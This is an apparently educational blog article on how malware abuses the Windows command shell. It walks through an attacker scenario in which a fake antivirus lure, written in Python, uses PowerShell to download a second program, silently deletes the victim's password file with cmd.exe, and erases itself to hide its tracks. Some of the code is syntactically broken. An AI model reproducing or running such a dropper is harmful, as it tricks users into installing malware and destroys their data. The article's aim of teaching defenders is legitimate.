Windows Command Shell — Malware Execution

In my previous article I have talked about Windows Registry Keys i.e. what are they and how attackers/adversaries can alter their values in order to stay persistent and keep on doing what they want to do.

In this, article I will be talking about Windows Command Shell and how adversaries take advantage of this to execute malicious commands, scripts, gain access to data, modify data, delete data, stay persistent and a lot more.

If we take a look on MITRE ATT&CK, it provides us with so much valuable information.

As, CMD is the primary command prompt available in every Windows OS, adversaries have been found taking advantage of it. Naming few Malwares, EMOTET, TrickBot, WastedLocker, Ryuk and many others have been found abusing CMD for execution.

Complete list Malwares abusing CMD for execution can be found HERE.

Starting The Real Game

We all know about CMD and have been using it since we got introduced to Microsoft Windows, but have we even checked what this tiny utility has to offer. Most Probably, NO.

So, I am going to take you on a little journey with me, a scenario which I have prepared to give you an idea on how actually this can lead to devastating situations.

Scenario

Consider, we are hackers, the bad guys and we want to spread our malicious software to everyone who visits a particular website. The website when loads redirects the user to an AD, enabling PANIC as it stated that we have found malware on your system. Download this software to get your system cleaned.

1. We need our software to be clean at first hand (This is going to be one, the user will download at first hand).
2. Once the user execute our first program, it will download another program from the internet.
3. We will delete the Password File.
4. After deleting the file, we will delete the program.

Let’s consider this basic scenario. We can build up many more basic-advanced scenario over this. Our main focus is to understand the root-grass-lower level of how actually at very basics this happens.

Let’s Python

Now, at first we need to write a little program, which the user has downloaded onto their system and on execution will download the second program from the internet. More Specifically, the DOMAIN of our choice!

Antivirus Program

import os
os.system("powershell.exe -Command Invoke-WebRequest https://www.deFr0ggy.github.io/ -O downloader.exe"

Downloader Program

import os
os.system('cmd.exe /C /Q & del \"C:\\Users\\b0x\\Desktop\\pass.txt" & del downloader.py')

Let’s combine them together, thus, we got the Anti-Malware Program.

Anti-Malware Program

So, we have now added both codes together. L

import os
os.system("powershell.exe -Command Invoke-WebRequest https://www.deFr0ggy.github.io/ -O downloader.exe & cmd.exe /C /Q & del \"C:\\Users\\b0x\\Desktop\\pass.txt" & del downloader.py"

Let’s take a look on it one-by-one.

At first we have the below code. Which is leveraging PowerShell command to download our Malicious Code onto the system.

powershell.exe -Command Invoke-WebRequest https://www.deFr0ggy.github.io/ -O downloader.exe

Once our second program has been downloaded. We are leveraging the CMD to delete the file which is present on the Desktop.

cmd.exe /C /Q & del \"C:\\Users\\b0x\\Desktop\\pass.txt"

Finally, once the file has been deleted, we are deleting our Downloader.py to remove our tracks. We can also delete our main program as well.

del downloader.py

So, the question should be what does cmd.exe /C /Q means. Well, that the secret here.

1. /Q means that we do not want any ECHO on the terminal i.e. we do not need any kind of output. Just throw it away.
2. /C means that as soon as our program finishes the job, close the terminal. We don’t want it to be there for any reason, neither we want to alert the user.

We can also add the code to the downloader.py and can execute it to delete the password file and then delete itself.

I will be preparing an another scenario where we will be hiding our program, adding it to the Start-Up folder and executing it when the user logs into the system to delete the file and then to delete itself.

Haunted Box

Now, it looks something like this on the victim’s machine. Showing the code here, as it’s a python file. Consider the user only executes the antivirus files and imagine there are no notepads

At, first the antivirus will download the downloader.py onto the machine. A terminal opens and then it drops the file onto the system.

We can see that now we have the Downloader File, but Pass.txt file is gone.

Finally, the Downloader File is gone as well, we are only left with the Antivirus Program.

Note

For demonstration purpose, I have utilized PYTHON, also I can covert the .py file to executable files. But in most of the cases such programs are built in C, C++ and C# as they can run natively on the system without any issue.

Conclusion

Thus, after reading through the article we have realized that CMD is not just a little utility, the more it is easy to use and limited, it provides evasion mechanism by default for adversaries. Thus, in order to keep our system secure, keep an eye on whatever is being executed by Windows Command Shell (CMD and PowerShell).

“PowerShell is simply CMD on steroids” — Kamran Saifullah

Also, this is to educate the people who download software from the internet without confirming their sources, neither hash values and end up losing their everything and get their systems infected with all kinds of bad crap. Always be vigilant and think 1000 times before you download something from the internet.